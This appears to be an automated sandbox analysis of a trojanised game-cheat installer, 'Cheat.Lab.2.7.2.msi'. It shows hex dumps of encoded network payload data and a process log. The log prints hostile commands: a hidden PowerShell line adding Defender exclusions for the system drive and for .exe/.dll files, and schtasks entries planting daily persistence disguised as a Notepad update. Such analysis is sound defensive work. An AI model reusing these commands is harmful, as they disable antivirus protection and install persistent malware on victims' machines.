30 2c 66 34 2c 31 33 66 2c 66 39 2c 31 33 64 2c 64 37 2c
                                                                                                                                                                      Data Ascii: 59,135,12b,154,13d,133,152,153,126,12d,14d,143,156,132,168,12d,123,10b,11a,13a,14c,13e,14e,141,12e,129,124,159,11c,137,11a,137,145,125,13e,15c,143,149,140,14b,123,135,164,133,14d,bc,bb,11e,b0,123,ba,142,e0,146,ee,149,d2,129,bd,161,cf,140,f4,13f,f9,13d,d7,
                                                                                                                                                                      2023-11-06 14:35:16 UTC751INData Raw: 66 2c 63 66 2c 64 34 2c 31 30 32 2c 64 65 2c 66 61 2c 64 61 2c 64 34 2c 65 61 2c 65 31 2c 65 32 2c 65 61 2c 65 63 2c 31 30 39 2c 63 31 2c 66 36 2c 31 32 62 2c 65 37 2c 64 34 2c 66 66 2c 64 31 2c 62 64 2c 31 30 33 2c 62 66 2c 64 39 2c 66 30 2c 65 31 2c 31 33 36 2c 65 30 2c 63 33 2c 31 30 39 2c 63 31 2c 65 65 2c 31 31 34 2c 64 30 2c 62 36 2c 64 65 2c 66 61 2c 64 38 2c 64 66 2c 31 33 63 2c 64 36 2c 64 64 2c 31 32 61 2c 31 35 33 2c 31 32 39 2c 31 30 38 2c 31 36 34 2c 31 34 62 2c 31 33 36 2c 65 39 2c 66 38 2c 63 66 2c 63 32 2c 62 61 2c 63 63 2c 64 39 2c 65 66 2c 64 33 2c 31 33 36 2c 64 35 2c 63 66 2c 63 34 2c 31 30 61 2c 66 30 2c 62 66 2c 64 66 2c 62 36 2c 64 36 2c 65 39 2c 63 34 2c 31 32 33 2c 65 64 2c 64 66 2c 31 32 62 2c 65 34 2c 65 65 2c 62 31 2c 63 31 2c
                                                                                                                                                                      Data Ascii: f,cf,d4,102,de,fa,da,d4,ea,e1,e2,ea,ec,109,c1,f6,12b,e7,d4,ff,d1,bd,103,bf,d9,f0,e1,136,e0,c3,109,c1,ee,114,d0,b6,de,fa,d8,df,13c,d6,dd,12a,153,129,108,164,14b,136,e9,f8,cf,c2,ba,cc,d9,ef,d3,136,d5,cf,c4,10a,f0,bf,df,b6,d6,e9,c4,123,ed,df,12b,e4,ee,b1,c1,
                                                                                                                                                                      2023-11-06 14:35:16 UTC767INData Raw: 2c 31 32 39 2c 31 34 33 2c 31 33 33 2c 31 33 38 2c 31 31 38 2c 31 33 64 2c 31 34 62 2c 62 63 2c 65 62 2c 31 34 61 2c 63 34 2c 65 37 2c 31 35 30 2c 31 33 65 2c 31 31 37 2c 31 31 34 2c 31 36 33 2c 31 33 39 2c 64 64 2c 64 38 2c 31 36 36 2c 31 32 33 2c 31 31 35 2c 31 32 32 2c 31 33 30 2c 31 34 30 2c 31 33 66 2c 31 33 34 2c 31 31 31 2c 31 34 38 2c 31 31 39 2c 31 32 39 2c 31 31 35 2c 31 34 66 2c 31 31 33 2c 31 33 65 2c 31 30 34 2c 31 33 66 2c 31 35 62 2c 31 33 38 2c 31 33 39 2c 31 35 62 2c 31 33 33 2c 63 61 2c 66 34 2c 31 34 36 2c 31 32 32 2c 31 32 66 2c 31 34 38 2c 31 33 39 2c 64 62 2c 63 37 2c 31 36 30 2c 31 32 32 2c 61 32 2c 61 65 2c 31 33 30 2c 31 33 34 2c 31 35 32 2c 31 34 30 2c 31 33 36 2c 31 34 39 2c 31 31 61 2c 31 31 37 2c 61 37 2c 65 63 2c 31 32 62 2c
                                                                                                                                                                      Data Ascii: ,129,143,133,138,118,13d,14b,bc,eb,14a,c4,e7,150,13e,117,114,163,139,dd,d8,166,123,115,122,130,140,13f,134,111,148,119,129,115,14f,113,13e,104,13f,15b,138,139,15b,133,ca,f4,146,122,12f,148,139,db,c7,160,122,a2,ae,130,134,152,140,136,149,11a,117,a7,ec,12b,
                                                                                                                                                                      2023-11-06 14:35:16 UTC783INData Raw: 38 2c 31 35 33 2c 31 32 39 2c 31 33 35 2c 31 36 35 2c 31 34 62 2c 31 35 65 2c 31 33 63 2c 31 36 38 2c 31 33 34 2c 31 32 35 2c 31 32 33 2c 31 33 32 2c 31 34 32 2c 31 35 34 2c 31 34 36 2c 31 35 36 2c 31 34 39 2c 31 33 37 2c 31 32 39 2c 31 32 61 2c 31 36 31 2c 31 33 34 2c 31 34 30 2c 31 32 32 2c 31 33 66 2c 31 35 64 2c 31 33 64 2c 31 34 33 2c 31 35 63 2c 31 34 35 2c 31 34 62 2c 31 35 38 2c 31 35 33 2c 31 32 39 2c 31 33 35 2c 31 36 35 2c 31 34 62 2c 31 35 65 2c 31 33 63 2c 31 36 38 2c 31 33 34 2c 31 32 35 2c 31 32 33 2c 31 33 32 2c 31 34 32 2c 31 35 34 2c 31 34 36 2c 31 35 36 2c 31 34 39 2c 31 33 37 2c 31 32 39 2c 31 32 61 2c 31 36 31 2c 31 33 34 2c 31 34 30 2c 31 32 32 2c 31 33 66 2c 31 35 64 2c 31 33 64 2c 31 34 33 2c 31 35 63 2c 31 34 35 2c 31 34 62 2c 31
                                                                                                                                                                      Data Ascii: 8,153,129,135,165,14b,15e,13c,168,134,125,123,132,142,154,146,156,149,137,129,12a,161,134,140,122,13f,15d,13d,143,15c,145,14b,158,153,129,135,165,14b,15e,13c,168,134,125,123,132,142,154,146,156,149,137,129,12a,161,134,140,122,13f,15d,13d,143,15c,145,14b,1
                                                                                                                                                                      2023-11-06 14:35:16 UTC799INData Raw: 33 2c 31 30 36 2c 31 33 38 2c 36 61 2c 65 37 2c 31 31 65 2c 31 33 35 2c 38 31 2c 64 66 2c 66 63 2c 31 35 65 2c 37 65 2c 31 30 30 2c 31 31 39 2c 31 34 36 2c 38 63 2c 31 31 35 2c 31 31 30 2c 31 32 61 2c 37 36 2c 31 32 32 2c 31 30 38 2c 31 35 66 2c 37 64 2c 31 32 35 2c 66 31 2c 31 32 36 2c 36 34 2c 65 66 2c 66 66 2c 31 35 35 2c 38 37 2c 31 31 33 2c 31 30 36 2c 31 33 38 2c 36 61 2c 65 37 2c 31 31 65 2c 31 33 35 2c 38 31 2c 64 66 2c 66 63 2c 31 35 65 2c 37 65 2c 31 30 30 2c 31 31 39 2c 31 34 36 2c 38 63 2c 31 31 35 2c 31 31 30 2c 31 32 61 2c 37 36 2c 31 32 32 2c 31 30 38 2c 31 35 66 2c 37 64 2c 31 32 35 2c 66 31 2c 31 32 36 2c 36 34 2c 65 66 2c 66 66 2c 31 35 35 2c 38 37 2c 31 31 33 2c 31 30 36 2c 31 33 38 2c 36 61 2c 65 37 2c 31 31 65 2c 31 33 35 2c 38 31 2c
                                                                                                                                                                      Data Ascii: 3,106,138,6a,e7,11e,135,81,df,fc,15e,7e,100,119,146,8c,115,110,12a,76,122,108,15f,7d,125,f1,126,64,ef,ff,155,87,113,106,138,6a,e7,11e,135,81,df,fc,15e,7e,100,119,146,8c,115,110,12a,76,122,108,15f,7d,125,f1,126,64,ef,ff,155,87,113,106,138,6a,e7,11e,135,81,
                                                                                                                                                                      2023-11-06 14:35:16 UTC815INData Raw: 65 2c 31 33 65 2c 66 36 2c 31 31 31 2c 31 34 36 2c 31 34 63 2c 31 30 62 2c 31 30 38 2c 31 32 61 2c 31 33 36 2c 31 31 38 2c 31 30 30 2c 31 35 66 2c 31 33 64 2c 31 31 62 2c 65 39 2c 31 32 36 2c 31 32 34 2c 65 35 2c 66 37 2c 31 35 35 2c 31 34 37 2c 31 30 39 2c 66 65 2c 31 33 38 2c 31 32 61 2c 64 64 2c 31 31 36 2c 31 33 35 2c 31 34 31 2c 64 35 2c 66 34 2c 31 35 65 2c 31 33 65 2c 66 36 2c 31 31 31 2c 31 34 36 2c 31 34 63 2c 31 30 62 2c 31 30 38 2c 31 32 61 2c 31 33 36 2c 31 31 38 2c 31 30 30 2c 31 35 66 2c 31 33 64 2c 31 31 62 2c 65 39 2c 31 32 36 2c 31 32 34 2c 65 35 2c 66 37 2c 31 35 35 2c 31 34 37 2c 31 30 39 2c 66 65 2c 31 33 38 2c 31 32 61 2c 64 64 2c 31 31 36 2c 31 33 35 2c 31 34 31 2c 64 35 2c 66 34 2c 31 35 65 2c 31 33 65 2c 66 36 2c 31 31 31 2c 31 34
                                                                                                                                                                      Data Ascii: e,13e,f6,111,146,14c,10b,108,12a,136,118,100,15f,13d,11b,e9,126,124,e5,f7,155,147,109,fe,138,12a,dd,116,135,141,d5,f4,15e,13e,f6,111,146,14c,10b,108,12a,136,118,100,15f,13d,11b,e9,126,124,e5,f7,155,147,109,fe,138,12a,dd,116,135,141,d5,f4,15e,13e,f6,111,14
                                                                                                                                                                      2023-11-06 14:35:16 UTC823INData Raw: 31 2c 31 32 36 2c 36 34 2c 65 66 2c 66 66 2c 31 35 35 2c 31 34 36 2c 31 35 36 2c 31 34 39 2c 31 33 37 2c 31 32 39 2c 31 32 61 2c 31 36 31 2c 31 33 34 2c 31 34 30 2c 31 32 32 2c 31 33 66 2c 31 35 64 2c 31 33 64 2c 31 34 33 2c 31 35 63 2c 31 34 35 2c 31 34 62 2c 31 35 38 2c 31 35 33 2c 31 32 39 2c 31 33 35 2c 31 36 35 2c 31 34 62 2c 31 35 65 2c 31 33 63 2c 31 36 38 2c 31 33 34 2c 31 32 35 2c 31 32 33 2c 31 33 32 2c 31 34 32 2c 31 35 34 2c 31 34 36 2c 31 35 36 2c 31 34 39 2c 31 33 37 2c 31 32 39 2c 31 32 61 2c 31 36 31 2c 31 33 34 2c 31 34 30 2c 31 32 32 2c 31 33 66 2c 31 35 64 2c 31 33 64 2c 31 34 33 2c 31 35 63 2c 31 34 35 2c 31 34 62 2c 31 35 38 2c 31 35 33 2c 31 32 39 2c 31 33 35 2c 31 36 35 2c 31 34 62 2c 31 35 65 2c 31 33 63 2c 31 36 38 2c 31 33 34 2c
                                                                                                                                                                      Data Ascii: 1,126,64,ef,ff,155,146,156,149,137,129,12a,161,134,140,122,13f,15d,13d,143,15c,145,14b,158,153,129,135,165,14b,15e,13c,168,134,125,123,132,142,154,146,156,149,137,129,12a,161,134,140,122,13f,15d,13d,143,15c,145,14b,158,153,129,135,165,14b,15e,13c,168,134,
                                                                                                                                                                      2023-11-06 14:35:16 UTC839INData Raw: 2c 31 30 62 2c 31 30 38 2c 31 32 61 2c 31 33 36 2c 31 31 38 2c 31 30 30 2c 31 35 66 2c 31 33 64 2c 31 31 62 2c 65 39 2c 31 32 36 2c 31 32 34 2c 65 35 2c 66 37 2c 31 35 35 2c 31 34 37 2c 31 30 39 2c 66 65 2c 31 33 38 2c 31 32 61 2c 64 64 2c 31 31 36 2c 31 33 35 2c 31 34 31 2c 64 35 2c 66 34 2c 31 35 65 2c 31 33 65 2c 66 36 2c 31 31 31 2c 31 34 36 2c 31 34 63 2c 31 30 62 2c 31 30 38 2c 31 32 61 2c 31 33 36 2c 31 31 38 2c 31 30 30 2c 31 35 66 2c 31 33 64 2c 31 31 62 2c 65 39 2c 31 32 36 2c 31 32 34 2c 65 35 2c 66 37 2c 31 35 35 2c 31 34 37 2c 31 30 39 2c 66 65 2c 31 33 38 2c 31 32 61 2c 64 64 2c 31 31 36 2c 31 33 35 2c 31 34 31 2c 64 35 2c 66 34 2c 31 35 65 2c 31 33 65 2c 66 36 2c 31 31 31 2c 31 34 36 2c 31 34 63 2c 31 30 62 2c 31 30 38 2c 31 32 61 2c 31 33
                                                                                                                                                                      Data Ascii: ,10b,108,12a,136,118,100,15f,13d,11b,e9,126,124,e5,f7,155,147,109,fe,138,12a,dd,116,135,141,d5,f4,15e,13e,f6,111,146,14c,10b,108,12a,136,118,100,15f,13d,11b,e9,126,124,e5,f7,155,147,109,fe,138,12a,dd,116,135,141,d5,f4,15e,13e,f6,111,146,14c,10b,108,12a,13
                                                                                                                                                                      2023-11-06 14:35:16 UTC855INData Raw: 35 2c 31 34 31 2c 64 35 2c 66 34 2c 31 35 65 2c 31 33 65 2c 66 36 2c 31 31 31 2c 31 34 36 2c 31 34 63 2c 31 30 62 2c 31 30 38 2c 31 32 61 2c 31 33 36 2c 31 31 38 2c 31 30 30 2c 31 35 66 2c 31 33 64 2c 31 31 62 2c 65 39 2c 31 32 36 2c 31 32 34 2c 65 35 2c 66 37 2c 31 35 35 2c 31 34 37 2c 31 30 39 2c 66 65 2c 31 33 38 2c 31 32 61 2c 64 64 2c 31 31 36 2c 31 33 35 2c 31 34 31 2c 64 35 2c 66 34 2c 31 35 65 2c 31 33 65 2c 66 36 2c 31 31 31 2c 31 34 36 2c 31 34 63 2c 31 30 62 2c 31 30 38 2c 31 32 61 2c 31 33 36 2c 31 31 38 2c 31 30 30 2c 31 35 66 2c 31 33 64 2c 31 31 62 2c 65 39 2c 31 32 36 2c 31 32 34 2c 65 35 2c 66 37 2c 31 35 35 2c 31 34 37 2c 31 30 39 2c 66 65 2c 31 33 38 2c 31 32 61 2c 64 64 2c 31 31 36 2c 31 33 35 2c 31 34 31 2c 64 35 2c 66 34 2c 31 35 65
                                                                                                                                                                      Data Ascii: 5,141,d5,f4,15e,13e,f6,111,146,14c,10b,108,12a,136,118,100,15f,13d,11b,e9,126,124,e5,f7,155,147,109,fe,138,12a,dd,116,135,141,d5,f4,15e,13e,f6,111,146,14c,10b,108,12a,136,118,100,15f,13d,11b,e9,126,124,e5,f7,155,147,109,fe,138,12a,dd,116,135,141,d5,f4,15e
                                                                                                                                                                      2023-11-06 14:35:16 UTC871INData Raw: 31 39 2c 31 34 36 2c 38 63 2c 31 31 35 2c 31 31 30 2c 31 32 61 2c 37 36 2c 31 32 32 2c 31 30 38 2c 31 35 66 2c 37 64 2c 31 32 35 2c 66 31 2c 31 32 36 2c 36 34 2c 65 66 2c 66 66 2c 31 35 35 2c 38 37 2c 31 31 33 2c 31 30 36 2c 31 33 38 2c 36 61 2c 65 37 2c 31 31 65 2c 31 33 35 2c 38 31 2c 64 66 2c 66 63 2c 31 35 65 2c 37 65 2c 31 30 30 2c 31 31 39 2c 31 34 36 2c 38 63 2c 31 31 35 2c 31 31 30 2c 31 32 61 2c 37 36 2c 31 32 32 2c 31 30 38 2c 31 35 66 2c 37 64 2c 31 32 35 2c 66 31 2c 31 32 36 2c 36 34 2c 65 66 2c 66 66 2c 31 35 35 2c 38 37 2c 31 31 33 2c 31 30 36 2c 31 33 38 2c 36 61 2c 65 37 2c 31 31 65 2c 31 33 35 2c 38 31 2c 64 66 2c 66 63 2c 31 35 65 2c 37 65 2c 31 30 30 2c 31 31 39 2c 31 34 36 2c 38 63 2c 31 31 35 2c 31 31 30 2c 31 32 61 2c 37 36 2c 31 32
                                                                                                                                                                      Data Ascii: 19,146,8c,115,110,12a,76,122,108,15f,7d,125,f1,126,64,ef,ff,155,87,113,106,138,6a,e7,11e,135,81,df,fc,15e,7e,100,119,146,8c,115,110,12a,76,122,108,15f,7d,125,f1,126,64,ef,ff,155,87,113,106,138,6a,e7,11e,135,81,df,fc,15e,7e,100,119,146,8c,115,110,12a,76,12
                                                                                                                                                                      2023-11-06 14:35:16 UTC887INData Raw: 35 64 2c 31 33 64 2c 31 34 33 2c 31 35 63 2c 31 34 35 2c 31 34 62 2c 31 35 38 2c 31 35 33 2c 31 32 39 2c 31 33 35 2c 31 36 35 2c 31 34 62 2c 31 35 65 2c 31 33 63 2c 31 36 38 2c 31 33 34 2c 31 32 35 2c 31 32 33 2c 31 33 32 2c 31 34 32 2c 31 35 34 2c 31 34 36 2c 31 35 36 2c 31 34 39 2c 31 33 37 2c 31 32 39 2c 31 32 61 2c 31 36 31 2c 31 33 34 2c 31 34 38 2c 36 36 2c 31 30 35 2c 31 35 65 2c 31 34 35 2c 38 37 2c 31 32 32 2c 31 34 36 2c 31 35 33 2c 39 63 2c 31 31 39 2c 31 32 61 2c 31 33 64 2c 61 39 2c 31 31 31 2c 31 35 66 2c 31 34 34 2c 61 63 2c 66 61 2c 31 32 36 2c 31 32 62 2c 37 36 2c 31 30 38 2c 31 35 35 2c 31 34 65 2c 39 61 2c 31 30 66 2c 31 33 38 2c 31 33 31 2c 36 65 2c 31 32 37 2c 31 33 35 2c 31 34 38 2c 36 36 2c 31 30 35 2c 31 35 65 2c 31 34 35 2c 38 37
                                                                                                                                                                      Data Ascii: 5d,13d,143,15c,145,14b,158,153,129,135,165,14b,15e,13c,168,134,125,123,132,142,154,146,156,149,137,129,12a,161,134,148,66,105,15e,145,87,122,146,153,9c,119,12a,13d,a9,111,15f,144,ac,fa,126,12b,76,108,155,14e,9a,10f,138,131,6e,127,135,148,66,105,15e,145,87
                                                                                                                                                                      2023-11-06 14:35:16 UTC903INData Raw: 31 33 32 2c 31 34 32 2c 31 35 34 2c 31 34 36 2c 31 35 36 2c 31 34 39 2c 31 33 37 2c 31 32 39 2c 31 32 61 2c 31 36 31 2c 31 33 34 2c 31 34 30 2c 31 32 32 2c 31 33 66 2c 31 35 64 2c 31 33 64 2c 31 34 33 2c 31 35 63 2c 31 34 35 2c 31 34 62 2c 31 35 38 2c 31 35 33 2c 31 32 39 2c 31 33 35 2c 31 36 35 2c 31 34 62 2c 31 35 65 2c 31 33 63 2c 31 36 38 2c 31 33 34 2c 31 32 35 2c 31 32 33 2c 31 33 32 2c 31 34 32 2c 31 35 34 2c 31 34 36 2c 31 35 36 2c 31 34 39 2c 31 33 37 2c 31 32 39 2c 31 32 61 2c 31 36 31 2c 31 33 34 2c 31 34 30 2c 31 32 32 2c 31 33 66 2c 31 35 64 2c 31 33 64 2c 31 34 33 2c 31 35 63 2c 31 34 35 2c 31 34 62 2c 31 35 38 2c 31 35 33 2c 31 32 39 2c 31 33 35 2c 31 36 35 2c 31 34 62 2c 31 35 65 2c 31 33 63 2c 31 36 38 2c 31 33 34 2c 31 32 35 2c 31 32 33
                                                                                                                                                                      Data Ascii: 132,142,154,146,156,149,137,129,12a,161,134,140,122,13f,15d,13d,143,15c,145,14b,158,153,129,135,165,14b,15e,13c,168,134,125,123,132,142,154,146,156,149,137,129,12a,161,134,140,122,13f,15d,13d,143,15c,145,14b,158,153,129,135,165,14b,15e,13c,168,134,125,123
                                                                                                                                                                      2023-11-06 14:35:16 UTC919INData Raw: 31 33 32 2c 31 34 32 2c 31 35 34 2c 31 34 36 2c 31 35 36 2c 31 34 39 2c 31 33 37 2c 31 32 39 2c 31 32 61 2c 31 36 31 2c 31 33 34 2c 31 34 30 2c 31 32 32 2c 31 33 66 2c 31 35 64 2c 31 33 64 2c 31 34 33 2c 31 35 63 2c 31 34 35 2c 31 34 62 2c 31 35 38 2c 31 35 33 2c 31 32 39 2c 31 33 35 2c 31 36 35 2c 31 34 62 2c 31 35 65 2c 31 33 63 2c 31 36 38 2c 31 33 34 2c 31 32 35 2c 31 32 33 2c 31 33 32 2c 31 34 32 2c 31 35 34 2c 31 34 36 2c 31 35 36 2c 31 34 39 2c 31 33 37 2c 31 32 39 2c 31 32 61 2c 31 36 31 2c 31 33 34 2c 31 34 30 2c 31 32 32 2c 31 33 66 2c 31 35 64 2c 31 33 64 2c 31 34 33 2c 31 35 63 2c 31 34 35 2c 31 34 62 2c 31 35 38 2c 31 35 33 2c 31 32 39 2c 31 33 35 2c 31 36 35 2c 31 34 62 2c 31 35 65 2c 31 33 63 2c 31 36 38 2c 31 33 34 2c 31 32 35 2c 31 32 33
                                                                                                                                                                      Data Ascii: 132,142,154,146,156,149,137,129,12a,161,134,140,122,13f,15d,13d,143,15c,145,14b,158,153,129,135,165,14b,15e,13c,168,134,125,123,132,142,154,146,156,149,137,129,12a,161,134,140,122,13f,15d,13d,143,15c,145,14b,158,153,129,135,165,14b,15e,13c,168,134,125,123
                                                                                                                                                                      2023-11-06 14:35:16 UTC935INData Raw: 34 2c 64 36 2c 31 35 36 2c 64 61 2c 31 33 37 2c 62 37 2c 31 32 61 2c 31 30 30 2c 31 33 34 2c 63 63 2c 31 32 32 2c 64 36 2c 31 35 64 2c 63 65 2c 31 34 33 2c 65 65 2c 31 34 35 2c 31 32 62 2c 31 35 38 2c 31 31 30 2c 31 32 39 2c 63 36 2c 31 36 35 2c 64 62 2c 31 35 65 2c 63 33 2c 31 36 38 2c 63 32 2c 31 32 35 2c 62 61 2c 31 33 32 2c 64 62 2c 31 35 34 2c 64 65 2c 31 35 36 2c 64 35 2c 31 33 37 2c 31 30 39 2c 31 32 61 2c 62 38 2c 31 33 34 2c 31 32 30 2c 31 32 32 2c 31 31 66 2c 31 35 64 2c 31 30 62 2c 31 34 33 2c 31 32 63 2c 31 34 35 2c 31 31 39 2c 31 35 38 2c 31 32 32 2c 31 32 39 2c 31 33 35 2c 31 36 35 2c 31 34 62 2c 31 35 65 2c 31 31 32 2c 31 36 38 2c 31 33 33 2c 31 32 35 2c 31 32 32 2c 31 33 32 2c 66 36 2c 31 35 34 2c 65 31 2c 31 35 36 2c 65 32 2c 31 33 37 2c
                                                                                                                                                                      Data Ascii: 4,d6,156,da,137,b7,12a,100,134,cc,122,d6,15d,ce,143,ee,145,12b,158,110,129,c6,165,db,15e,c3,168,c2,125,ba,132,db,154,de,156,d5,137,109,12a,b8,134,120,122,11f,15d,10b,143,12c,145,119,158,122,129,135,165,14b,15e,112,168,133,125,122,132,f6,154,e1,156,e2,137,
                                                                                                                                                                      2023-11-06 14:35:16 UTC951INData Raw: 61 2c 36 64 2c 34 62 2c 37 37 2c 34 33 2c 33 34 2c 33 32 2c 34 31 2c 35 31 2c 36 33 2c 35 35 2c 36 35 2c 35 38 2c 34 36 2c 33 38 2c 33 39 2c 37 30 2c 34 33 2c 34 66 2c 33 31 2c 34 65 2c 36 63 2c 34 63 2c 35 32 2c 36 62 2c 35 34 2c 35 61 2c 36 37 2c 36 32 2c 33 38 2c 34 34 2c 37 34 2c 35 61 2c 36 64 2c 34 62 2c 37 37 2c 34 33 2c 33 34 2c 33 32 2c 34 31 2c 35 31 2c 36 33 2c 35 35 2c 36 35 2c 35 38 2c 34 36 2c 38 33 2c 37 65 2c 63 32 2c 39 31 2c 39 34 2c 37 64 2c 38 31 2c 39 65 2c 37 61 2c 62 36 2c 64 37 2c 63 30 2c 35 61 2c 65 35 2c 36 35 2c 38 66 2c 61 35 2c 64 64 2c 63 65 2c 62 33 2c 62 61 2c 65 39 2c 39 36 2c 39 64 2c 61 30 2c 61 38 2c 62 64 2c 63 38 2c 61 34 2c 63 37 2c 63 32 2c 61 62 2c 39 62 2c 61 64 2c 37 30 2c 38 35 2c 35 32 2c 38 34 2c 62 61 2c 64
                                                                                                                                                                      Data Ascii: a,6d,4b,77,43,34,32,41,51,63,55,65,58,46,38,39,70,43,4f,31,4e,6c,4c,52,6b,54,5a,67,62,38,44,74,5a,6d,4b,77,43,34,32,41,51,63,55,65,58,46,83,7e,c2,91,94,7d,81,9e,7a,b6,d7,c0,5a,e5,65,8f,a5,dd,ce,b3,ba,e9,96,9d,a0,a8,bd,c8,a4,c7,c2,ab,9b,ad,70,85,52,84,ba,d



                                                                                                                                                                      Target ID:0
                                                                                                                                                                      Start time:15:34:57
                                                                                                                                                                      Start date:06/11/2023
                                                                                                                                                                      Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\Cheat.Lab.2.7.2.msi"
                                                                                                                                                                      Imagebase:0x7ff60c680000
                                                                                                                                                                      File size:69'632 bytes
                                                                                                                                                                      MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                      Has exited:true

Target ID:2
Start time:15:34:57
Start date:06/11/2023
Path:C:\Windows\System32\msiexec.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\msiexec.exe /V
Imagebase:0x7ff60c680000
File size:69'632 bytes
MD5 hash:E5DA170027542E25EDE42FC54C929077
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:false

Target ID:3
Start time:15:34:57
Start date:06/11/2023
Path:C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):true
Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding F46D88023010FA67F9BE0B7659EC2472 C
Imagebase:0xdc0000
File size:59'904 bytes
MD5 hash:9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:4
Start time:15:35:02
Start date:06/11/2023
Path:C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):true
Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding CF599F91F9CA52D79045F3DD2E6AB85B
Imagebase:0xdc0000
File size:59'904 bytes
MD5 hash:9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:5
Start time:15:35:02
Start date:06/11/2023
Path:C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):true
Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 2387AF9F5B3315EE543DBCEF741FA41F E Global\MSI0000
Imagebase:0xdc0000
File size:59'904 bytes
MD5 hash:9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:6
Start time:15:35:03
Start date:06/11/2023
Path:C:\Windows\Installer\MSIC01A.tmp
Wow64 process (32bit):true
Commandline:C:\Windows\Installer\MSIC01A.tmp" /EnforcedRunAsAdmin /RunAsAdmin /HideWindow "C:\Program Files\Cheat Lab Inc\Cheat Lab\exclusion.bat
Imagebase:0xf30000
File size:399'328 bytes
MD5 hash:B9545ED17695A32FACE8C3408A6A3553
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Antivirus matches:
• Detection: 0%, ReversingLabs
Reputation:low
Has exited:true

Target ID:7
Start time:15:35:03
Start date:06/11/2023
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:C:\Windows\System32\cmd.exe" /C ""C:\Program Files\Cheat Lab Inc\Cheat Lab\exclusion.bat"
Imagebase:0xa40000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:8
Start time:15:35:03
Start date:06/11/2023
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6ee680000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:9
Start time:15:35:03
Start date:06/11/2023
Path:C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe
Wow64 process (32bit):false
Commandline:C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe" "C:\Program Files\Cheat Lab Inc\Cheat Lab\script.lua
Imagebase:0x7ff738a30000
File size:1'159'168 bytes
MD5 hash:9CB9E0D0975E51A90BDED2B3BE8FACA9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low
Has exited:true

Target ID:10
Start time:15:35:03
Start date:06/11/2023
Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):true
Commandline:powershell -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force"
Imagebase:0x770000
File size:433'152 bytes
MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:true
Has administrator privileges:true
Programmed in:.Net C# or VB.NET
Reputation:high
Has exited:true

Target ID:13
Start time:15:35:09
Start date:06/11/2023
Path:C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe
Wow64 process (32bit):false
Commandline:C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe" "C:\Program Files\Cheat Lab Inc\Cheat Lab\script.lua
Imagebase:0x7ff738a30000
File size:1'159'168 bytes
MD5 hash:9CB9E0D0975E51A90BDED2B3BE8FACA9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low
Has exited:true

Target ID:14
Start time:15:35:10
Start date:06/11/2023
Path:C:\Windows\System32\schtasks.exe
Wow64 process (32bit):false
Commandline:schtasks /create /sc daily /st 11:45 /f /tn NotepadUpdateTask_NzEz /tr ""C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exe" "C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\script.lua""
Imagebase:0x7ff7dfdb0000
File size:235'008 bytes
MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:15
Start time:15:35:10
Start date:06/11/2023
Path:C:\Windows\System32\schtasks.exe
Wow64 process (32bit):false
Commandline:schtasks /create /sc daily /st 11:45 /f /tn "LuaJIT" /tr ""C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe" "C:\Program Files\Cheat Lab Inc\Cheat Lab\script.lua""
Imagebase:0x7ff7dfdb0000
File size:235'008 bytes
MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

                                                                                                                                                                      Target ID:16
                                                                                                                                                                      Start time:15:35:10
                                                                                                                                                                      Start date:06/11/2023
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
